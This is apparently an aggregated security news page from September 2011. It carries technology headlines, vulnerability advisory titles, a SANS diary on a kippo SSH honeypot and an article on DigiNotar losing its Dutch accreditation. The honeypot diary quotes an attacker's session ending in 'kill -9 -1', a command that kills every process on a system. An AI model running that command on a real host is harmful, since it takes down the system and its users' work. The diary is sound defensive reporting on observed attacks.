InfoSec News

MasterCard on Thursday gave a sneak peek into the near future of mobile payment systems and said that the Google Wallet application is within weeks of being rolled out commercially.
A federal judge threw out a small part of Oracle's Java lawsuit against Google on Thursday but allowed the bulk of the case to proceed.
Smartphones can help make people healthier, according to three startups that stood out among young mobile companies presenting their ideas at the Demo Fall conference this week.
A mammoth army of infected computers is being assembled, but it's unclear yet what purpose they will be put to.
Microsoft will release a CTP (Community Technology Preview) of a new type of compiler its researchers have been building, code-named Project Roslyn, the company executive overseeing the C# programming language announced Thursday.
PlayBook shipments dropped in half for Research In Motion during its second quarter, which also saw revenue continue to plummet.
Microsoft's long-awaited deeper look at Windows 8 on Tuesday has piqued consumer interest, according to a company that scores online news and social media trends.
Facebook launched a new feature that lets you quickly group friends into lists to make sharing with certain people easier. Here are five important facts you should know before you get started.
"More work" needs to be done to establish Windows Phone in the marketplace, admitted Microsoft boss Steve Ballmer this week. And he promised Wall Street analysts that Microsoft was ready, willing, and able to do it.
PayPal has unveiled a mobile payment initiative for shoppers that doesn't require near-field communication (NFC) technology inside smartphones.
So you want to try out Windows 8. Excellent! But you're not foolhardy enough to try using a developer preview build as your main work/play operating system--you just want to dabble. We'll show you how to download and install the Windows 8 developer's preview on to a separate partition (or separate hard drive, if you have a spare). If you don't feel like mucking your hard drive with another partition, read How To Download and Install Windows 8 to a Virtual Machine for a less intrusive way to get Windows 8 up and running on your PC.
We've shown you how to go about installing the new Windows 8 developer preview on a brand-new hard drive or a partition of your existing hard drive--that's easy.
Intel hopes to redefine the PC market with a new category of thin and light laptops called ultrabooks, but at around $1,000, their hefty price tag leaves questions about the products' viability, attendees at the Intel Developer Forum conference said this week.
Intel on Thursday showed an experimental low-power processor the size of a postage stamp that could run PCs on solar power.
The potential of SAP's HANA in-memory computing engine permeated the agenda and had attendees' tongues wagging this week at the Tech Ed conference in Las Vegas, but the technology still has some maturing to do.
RETIRED: WordPress Event Registration 'event_id' Parameter SQL Injection Vulnerability
Event Registration Plugin for WordPress 'event_id' Parameter SQL Injection Vulnerability
Microsoft SharePoint XML Handling Remote File Disclosure Vulnerability
Google and representatives for authors and publishers told a U.S. District Court judge Thursday that they would like to continue discussions on a revised settlement in a copyright infringement case that has dragged on for years.
Amazon on Thursday said that many of its Web services now have a crucial certification that allows federal government agencies with strict security requirements to use the services.
Microsoft will not support browser plug-ins, including Adobe's Flash, in one of the two versions of Internet Explorer to be bundled with Windows 8, a company executive said today.
[Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
[Onapsis Security Advisory 2011-014] SAP WebAS Remote Denial of Service
Microsoft's Binary Planting Clean-Up Mission
Google and representatives for authors and publishers told a U.S. District Court judge Thursday that they would like to continue discussions on a revised settlement in a copyright infringement case that has dragged on for years.
Apple confirmed on Thursday that it filed a lawsuit against Samsung in the U.K.'s High Court earlier in the week, as the two technology giants continue a legal tit-for-tat revolving around their mobile phone and tablet products.
The PCI Security Standards Council is expected to issue guidelines on use of point-to-point encryption in protecting sensitive payment card data, but the narrow approach — which is focused on hardware — is raising questions.
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
SAP WebAS Malicious SAP Shortcut Generation Remote Command Injection Vulnerabiltiy
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Joyent is upgrading its public cloud service with better analytics and the ability to run Linux and Windows, as it hopes to persuade CIOs to move more applications to the company's cloud, it said on Thursday.
In business discussions around technology, it can be easy to get lost in the weeds. As IT departments and media try to forecast the next new wave of applications, the viability of one platform over another gets put into question, as does the hype cycle around emerging technologies. Society's tendency to focus on the micro trends puts the industry at risk of ignoring larger, more urgent technology issues. And at present, there is no technology discussion bigger than cloud computing.
Micron today released its first entry-level solid state drive to be used as a boot drive in servers or for I/O intensive read applications, such as video streaming in cloud computing environments.
[Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products
Cisco Security Advisory: Cisco Unified Service Monitor and Cisco Unified Operations Manager Remote Code Execution Vulnerabilities
Cisco Security Advisory: CiscoWorks LAN Management Solution Remote Code Execution Vulnerabilities

Friends, Foes and Faceless Denizens – The Real Social Network
CSO (blog)
Rather, it relies on recognizing the value of your Social engineering is a topic we plan to cover more on future Security Connected posts. For more details and regular updates on McAfee happenings and infosec news, join the conversation on Twitter by ...

and more »

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
I had an interesting detect in one of my kippo honeypots last week. Kippo, if you are not familiar with, is a script simulating an ssh server. It is typically configured to allow root logins with weak passwords and can be the source of never ending entertainment as you see confused script kiddies. The honeypot logs key strokes and is able to replay them in real time.
In this particular case, the attacker logged in, and issues the following commands:

kippo:~# w
06:37:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
root pts/0 06:37 0.00s 0.00s 0.00s w

kippo:~# ps x
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x

kippo:~# kill -9 -1

In short, the attacker went in, did minimal recognizance, and then went ahead killing the system (terminating all processes with a PID larger then 1). A real system would be unresponsive as a result.

Not clear if this is a vigilante/vandal killing badly configured ssh server, or if this was an intent to detect a honeypot (But then again, the real system would be dead as a result, and there are less destructive ways to detect simple honeypots like kippo.

The speed of the attack suggests that it was performed manually. We do not see a big change in ssh probes overall.

Any ideas? Has anybody seen similar vandals?

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Linux Kernel CIFS Mount Local Denial of Service Vulnerability
OpenSSL ECDH Ciphersuites Remote Denial of Service Vulnerability
Worldwide semiconductor sales have slowed in 2011, and the market is on pace for a small decline compared to last year, market research company Gartner said on Thursday.
Dell plans to double the number of staff selling, marketing and developing the products of Force10 Networks, the networking company it acquired in August, an executive said.
With Windows Server 8, Microsoft has outdone itself, from a revamped UI to hundreds of new features, including vastly improved virtualization management
Now that developers have in their hands a pre-release version of Windows 8 running on a special edition of the Samsung Series 7 tablet, analysts are weighing in on how many developers will ultimately build Windows tablet applications.
IT groups are starting to have a say in their companies' social media strategy moves and the decisions about social tools they deploy.
Intel's Thunderbolt high-speed interconnect technology, which shuffles data between PCs and devices like displays and external storage, could be years away from getting optical technology, an Intel executive said this week.

Posted by InfoSec News on Sep 15

By Jessica Derschowitz
CBS News
September 14, 2011

Scarlett Johansson is the latest celebrity wrapped up in a nude photo

The FBI is reportedly investigating the release of photos allegedly
hacked from the 26-year-old actress' cell phone.

"The FBI is aware of the alleged hacking incident and is looking into
it," an FBI official told Sources...

Posted by InfoSec News on Sep 15

CSO Online (Australia)
13 September, 2011

Talk about disconnect! Analysts, security engineers and other infosec
geeks aim for Swiss-watch precision, because one little mistake means
the bad guys win. We want people to take this seriously, right? So why
do certain marketing and PR departments spread a load of what my father,
a man more polite than...

Posted by InfoSec News on Sep 15

By Mathew J. Schwartz
September 14, 2011

The number-one advanced persistent threat (APT) attack vector is now not
technology, but social engineering. Furthermore, security is no longer
about trying to keep all intruders outside of the network perimeter, but
rather acknowledging that security today involves living in a state of
constant compromise.


Posted by InfoSec News on Sep 15

By Ulrik McKnight
The India Site
Sep 14, 2011

Since 2009 there has been repeated evidence of severe hacking of Indian
government and military organizations, industries, and even journalists’
email accounts. The evidence shows successful long-term cyber-attacks
and cyber-espionage, with strong indications that nation states are

The list of compromised Indian targets reads like a...

Posted by InfoSec News on Sep 15

By Bill Gertz
The Washington Times
September 13, 2011

The general in charge of U.S. cyberwarfare forces said Tuesday that
future computer-based combat likely will involve electronic strikes that
cause widespread power outages and even physical destruction of
thousand-ton machines.

Army Gen. Keith Alexander, commander of the new U.S. Cyber...
Next to being a provider of SSLcertificates (which most browsers now distrust), DigiNotar also issued so-called qualified certificates. These are used to create digital signatures and they are much stricter regulated that the run of the mill SSLand EVSSLcertificates we all know from web servers and the like.
OPTA, the Dutch independent post and telecommunication authority - think of them as the regulator- , has terminated [in Dutch] the accreditation of DigiNotar as a certificate provider on Sept 14th, 2011. This pertains to their qualified certificates.
It's probably best to give a very short introduction on what qualified certificates, accredited providers are and why this is so important.

The EU has issued guidelines (Directive 1999/93/EC) that have been translated in local law by member states such as the Netherlands that establish legal value in digital signatures. There are a number of levels of trust in this from the legislators. Typically -local laws differ a bit sometimes, but they all implement the same concept- a digital signature is going to be -by law- equivalent to a manual one. At the lowest level a digital signature can be as little as writing your name under an email, but all remains to be proven in court afterwards. It gets more interesting on the higher levels: if the digital signature is proven to be a qualified digital signature, the equivalence to a manual signature is automatic (i.e. no discussion in court). But it still needs to be proven that the digital signature is in fact qualified. The ultimate level however are qualified digital signatures made with the means provided by an accredited provider. There the proof that the digital signature is qualified is automatic as well as it's done up front (in the audits of the accredited providers).
This all is guided under the ETSITS101 456 standard from a more technical point of view. This standard sets the requirements.
Since the means provided by an accredited provider can be used to create digital signatures that are almost only disputable if one proofs fraud, it's to all of us -esp those living or doing business in the EU- of critical importance that there are no rogue qualified certificates out there with our name on it as they carry such a high legal weight.

OPTA reports a timeline that's been mostly public knowledge except for their own actions and the interaction with DigiNotar and their auditors. The report concludes that DigiNotar was not only not acting in accordance to ETSITS101 456 on quite a few points, but also breaking the relevant local laws.
OPTA also names PriceWaterhouseCoopers as the (regular)auditors of DigiNotar, but does not go as far as to name them the ones that gave them the apparent clean bill of health on July 27th, 2011: A number of servers were compromised. The hackers have obtained administrative rights to the outside webservers, the CA server Relaties-CA and also to Public-CA. Traces of hacker activity started on June 17th and ended on July 22nd. Which was later dramatically proven to be untrue.
OPTAreports there are about 4200 qualified (signing) certificates issued by DigiNotar. These will now have to be contacted by DigiNotar under supervision of OPTA. These certificate holders will have to seek another provider if they have not done so already.
The revocation as an accredited provider, also means that DigiNotar doesn't meet the requirements for their PKIOverheid activities anymore.

Swa Frantzen -- Section 66 (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Internet Storm Center Infocon Status